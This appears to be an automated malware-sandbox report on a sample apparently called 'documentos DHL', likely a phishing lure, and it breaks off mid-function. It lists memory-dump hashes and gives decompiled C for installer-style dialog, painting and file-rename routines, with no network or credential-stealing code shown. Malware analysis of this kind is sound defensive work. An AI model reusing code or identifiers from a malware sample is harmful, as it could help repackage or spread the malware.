Opcode ID: fce26be900e07c3b0b35ce38ab6fbc329c1b47167afc8f508f54a43d0f87b9c1
Instruction ID: 46c27c4dde02bf6a1bbc8e184fbecbdbff92723e4c9ffdaea5a98c5f0b0254ea
Opcode Fuzzy Hash: fce26be900e07c3b0b35ce38ab6fbc329c1b47167afc8f508f54a43d0f87b9c1
Instruction Fuzzy Hash: 1E613D76A0474A8FDB38EF29ECC07EA7BA2EF997A0F58441DDC499B601D7319945CB00

Uniqueness

Uniqueness Score: -1.00%

Function 03377EEC Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 037cbf222466ad9a4c6774e75155306fe566c6b46ca7f5c7cbc4a95763d1be03
Instruction ID: ebe0506784fcf6a5855bd2be68f654f0e81f722ca324e8c2e0845c1b1aeca27a
Opcode Fuzzy Hash: 037cbf222466ad9a4c6774e75155306fe566c6b46ca7f5c7cbc4a95763d1be03
Instruction Fuzzy Hash: 176147B6A013899FDF30AF68CD847DA37A6BF45310F16422AEC5D9F340D7344A418B55

Uniqueness

Uniqueness Score: -1.00%

Function 033911B4 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca53b9bf7fc714f543cc6511ca2271b8389e51229646c8765a187a79c0d725ae
Instruction ID: 4f7284f721377687a5b08209f28aab52bbecbadb4449108a2e4243bbe50de94f
Opcode Fuzzy Hash: ca53b9bf7fc714f543cc6511ca2271b8389e51229646c8765a187a79c0d725ae
Instruction Fuzzy Hash: BB5165B2418BC4CFC332AFBC8C543E67BE9EF16640F45096EC9C6CBA12D628558AC755

Uniqueness

Uniqueness Score: -1.00%

Function 03378D5E Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c5ac48d795b9839043ccae0c3fae772c7212f637b43854d7bc8d4ab34ddb294
Instruction ID: ce623551c0a142093800bddf822c2dbb6472d4e3382e8449af7051bdb4af5ddb
Opcode Fuzzy Hash: 2c5ac48d795b9839043ccae0c3fae772c7212f637b43854d7bc8d4ab34ddb294
Instruction Fuzzy Hash: 995137B5504789CFDB30DE698CA87D677A7BFA9340F84822ECC8987745D73055828B01

Uniqueness

Uniqueness Score: -1.00%

Function 0338EBC3 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181d49a0d99ef234dc45946508395744463cfc083da77f6818a9b1cbc626922f
Instruction ID: 76defcd031a5ec59fbdf7fd9854641751ecc5e51ece98f1357d9190d6dbb167e
Opcode Fuzzy Hash: 181d49a0d99ef234dc45946508395744463cfc083da77f6818a9b1cbc626922f
Instruction Fuzzy Hash: 5F61DF76504386CFDB6A9F78DA963C63BB2EF52380F464166CC9A8B270D73449058B22

Uniqueness

Uniqueness Score: -1.00%

Function 0339021B Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d16d352a4f7be0182c110a7ee8236068081bb3cbeb89fe36e8ea0853d256c430
Instruction ID: 5b54c0aaf11a16710cd6abcb4c2ae8595a1a4fab7252e20d4cd6ad80cdc2a768
Opcode Fuzzy Hash: d16d352a4f7be0182c110a7ee8236068081bb3cbeb89fe36e8ea0853d256c430
Instruction Fuzzy Hash: 7C514971A00309CFEB70DE7889D4BCA77A1EF9A680F95412EDD858B615DB345942CB01

Uniqueness

Uniqueness Score: -1.00%

Function 03378EAF Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dd5d695378e198d42519ddf738ecfb309d82ac4aa16dc51f591f9666ff4b132
Instruction ID: c8425499e939e3812b6d67a7e9eebdef965387d154980d0e6e7c0b3ec1bc49ee
Opcode Fuzzy Hash: 8dd5d695378e198d42519ddf738ecfb309d82ac4aa16dc51f591f9666ff4b132
Instruction Fuzzy Hash: 5D4137B2454B99CBDB32AE7C8C683D67BA6BF69640F84462FCC8687B0AC77054859701

Uniqueness

Uniqueness Score: -1.00%

Function 0337BC70 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c491cacb319d8f1fec4c6e5dad02d0c42639c3c952b87538f3c816f28fc6fac
Instruction ID: e67ece3395fe779ac82c3f2353cfdd02079334d71f1c97a4ec27f99c78a9ff69
Opcode Fuzzy Hash: 0c491cacb319d8f1fec4c6e5dad02d0c42639c3c952b87538f3c816f28fc6fac
Instruction Fuzzy Hash: 155113B1104BC88FC772AF6889483D6BBE9FF14760F51866ECC858BB26C7785585CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0337BBD5 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac530217162580f4184f5c70121e4dc06d7eb4991094e57f7f452064f2ed5cbe
Instruction ID: c4d28f4ef4ba90a17c04c3fa5e70a16cabb7a70d7e1f790852eefc19807809db
Opcode Fuzzy Hash: ac530217162580f4184f5c70121e4dc06d7eb4991094e57f7f452064f2ed5cbe
Instruction Fuzzy Hash: 33413A716003498FDB30DF68CD893DA77E6EF55760F51826ACC86DB225E3389982CB05

Uniqueness

Uniqueness Score: -1.00%

Function 0338E2E8 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 338be3a90c08a7f3b28f944d0e1f54ee4af837817bb44812bed35c5541a95ec2
Instruction ID: 77f7dc8a2c43becd845cbe4fe68cb0634a202a442c86af10718535edc0e14633
Opcode Fuzzy Hash: 338be3a90c08a7f3b28f944d0e1f54ee4af837817bb44812bed35c5541a95ec2
Instruction Fuzzy Hash: 5841D375604345DEDF30BF798DE83DE36A29F54344F92452FCC869B609D63049C78A06

Uniqueness

Uniqueness Score: -1.00%

Function 0337675F Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a1095a0703446318b0fa128ff9f7f749e20c2c7df732b2473d0403a17938191
Instruction ID: 22b3f4a8c88674d62c27ce7bf83de993f9d398f367d0300f7ca66b9bdd274081
Opcode Fuzzy Hash: 1a1095a0703446318b0fa128ff9f7f749e20c2c7df732b2473d0403a17938191
Instruction Fuzzy Hash: 993168364687D5EBC72A9F34C8516DA7FE8BF06360F1949ADC4D05B513C364504ADB81

Uniqueness

Uniqueness Score: -1.00%

Function 0337BC4B Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46c497553aad04d69ef4f6b62445dc8066365d223355b3479704fe88d4ccec1c
Instruction ID: 27d987733d28e21f99e9a52a47968a2d48349ae7243b9f0f16a5133b0acb5742
Opcode Fuzzy Hash: 46c497553aad04d69ef4f6b62445dc8066365d223355b3479704fe88d4ccec1c
Instruction Fuzzy Hash: 02310A715003888FD7319F248D893DAB7F5EF55360F5685AECC868F266D3385586CB05

Uniqueness

Uniqueness Score: -1.00%

Function 03390044 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e84dae403c211b59d67e512d42431b44c32b2a1804a6e5be762cd5af402483
Instruction ID: 8f8115574d20ec568411ea1b2618b5e5af23881f02a62199baf658ad79e9eff4
Opcode Fuzzy Hash: e1e84dae403c211b59d67e512d42431b44c32b2a1804a6e5be762cd5af402483
Instruction Fuzzy Hash: B621A33960838BCBEF34DE28C9E13DA73A2FF1A790F49406ACC898BA45D7309645D701

Uniqueness

Uniqueness Score: -1.00%

Function 0337F2D4 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b41916bae66e34fcceff7a347f2249aa2675ca7b729112e3e873932a2ba523
Instruction ID: 9d82746dd30f396340c0ddfd125fe3d9a81b97a33c834b10f2f3ca62deb082ff
Opcode Fuzzy Hash: 09b41916bae66e34fcceff7a347f2249aa2675ca7b729112e3e873932a2ba523
Instruction Fuzzy Hash: F221F8B2418FD4CFC363AB7CE558680BBE8F7196407480A6FC89187F07C5A46089E785

Uniqueness

Uniqueness Score: -1.00%

Function 0337B9AC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1846a1e3a65426fa765d9983a0ebdb649d3b2e7d70c1386cebe19c3881200443
Instruction ID: f9dae8f0d3812a9739dc3b5933c1d4a5adf36c52e48d5c6e47a6001ef6f89fd6
Opcode Fuzzy Hash: 1846a1e3a65426fa765d9983a0ebdb649d3b2e7d70c1386cebe19c3881200443
Instruction Fuzzy Hash: EE310F3164835A8FDB799F34CA852C63B32FF16358F6080BDCCA25A916E7360647CB06

Uniqueness

Uniqueness Score: -1.00%

Function 0337BF0F Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ecaa219d8497feb0cc4f4380734cff0260fc3f8fd0e6cb68ca75fdee14d8f4b
Instruction ID: 88728700432013220a5955db9a307ed9228111e6c63d3103ea90926b348df783
Opcode Fuzzy Hash: 8ecaa219d8497feb0cc4f4380734cff0260fc3f8fd0e6cb68ca75fdee14d8f4b
Instruction Fuzzy Hash: 1C1102312003848FEB71AF2489493D9B7F6FF11760F57409ECC868B222E3395982DB11

Uniqueness

Uniqueness Score: -1.00%

Function 0338F516 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a2a8210c69fcd535310027f5e47409206aadb23bbccb65e8853802877d19097
Instruction ID: e749aa7dd5ec79ada846731f72035c8238d50c84c50381b883d7c574e2456d69
Opcode Fuzzy Hash: 5a2a8210c69fcd535310027f5e47409206aadb23bbccb65e8853802877d19097
Instruction Fuzzy Hash: 60C048312614408BCA4ACE08E6D0E8873A7BB40B00FE15480F0128BF95C225F888CA41

Uniqueness

Uniqueness Score: -1.00%

Function 004044E2 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004044E2(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216f4 =  *0x4216f4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004043AC(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281e0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404791(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a248, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a248, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216f4 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422700 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404367(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040476D();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42921c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404493;
				if(_t110 != 2) {
					_v8 = E00404459;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404345(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404345(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404367( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E0040437A(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a254 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216f4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216f4 = 0;
				return 0;
			}

0x004044f4
0x00404621
0x0040467e
0x00404682
0x0040474f
0x00404751
0x00404751
0x00404757
0x00404757
0x0040475a
0x00000000
0x00404761
0x00404690
0x00404696
0x004046a0
0x004046ab
0x004046ae
0x004046b1
0x004046bc
0x004046bf
0x004046c6
0x004046d3
0x004046e4
0x004046ea
0x004046f2
0x00404700
0x00404706
0x00404706
0x004046c6
0x00404710
0x00000000
0x0040471b
0x0040471f
0x0040472f
0x0040472f
0x00404735
0x00404741
0x00404741
0x00000000
0x00404745
0x00404710
0x0040462c
0x00000000
0x0040463e
0x00404643
0x00404649
0x00000000
0x00000000
0x00404672
0x00404674
0x00404679
0x00000000
0x00404679
0x0040462c
0x004044fa
0x004044fd
0x00404502
0x00404513
0x00404513
0x0040451b
0x0040451e
0x00404522
0x00404525
0x00404529
0x0040452c
0x0040452f
0x00404532
0x00404539
0x0040453b
0x0040453b
0x00404545
0x00404552
0x0040455c
0x00404561
0x00404564
0x00404569
0x00404580
0x00404587
0x0040459a
0x0040459d
0x004045b1
0x004045b8
0x004045bd
0x004045c2
0x004045c2
0x004045d0
0x004045de
0x004045f0
0x004045f5
0x00404605
0x00404607
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404580
GetDlgItem.USER32(?,000003E8), ref: 00404594
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045B1
GetSysColor.USER32(?), ref: 004045C2
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
lstrlenW.KERNEL32(?), ref: 004045E3
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
GetDlgItem.USER32(?,0000040A), ref: 0040465E
SendMessageW.USER32(00000000), ref: 00404665
GetDlgItem.USER32(?,000003E8), ref: 00404690
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
SetCursor.USER32(00000000), ref: 004046E4
LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
SetCursor.USER32(00000000), ref: 00404700
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040472F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741

Strings

YD@, xrefs: 004046EC
Call, xrefs: 004046BF
N, xrefs: 0040467E

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N$YD@
API String ID: 3103080414-3276248472
Opcode ID: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
Instruction ID: b733f22c3e4a4344af423a89e947fb2470a434e6d87e1c723dfed1fecd84da00
Opcode Fuzzy Hash: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
Instruction Fuzzy Hash: E16172B1A00209BFDB109F60DD85AAA7B69FB85354F00813AFB05BB1E0D7789951CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a254;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429240, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a248;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405FFC Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FFC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426dc8 = 0x55004e;
				 *0x426dcc = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275c8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269c8, "%ls=%ls\r\n", 0x426dc8, 0x4275c8);
						_t53 = _t52 + 0x10;
						E004063D2(_t37, 0x400, 0x4275c8, 0x4275c8,  *((intOrPtr*)( *0x42a254 + 0x128)));
						_t12 = E00405EA2(0x4275c8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405F25(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405E07(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405E07(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405E5D(_t24 + _t46, 0x4269c8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405F54(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
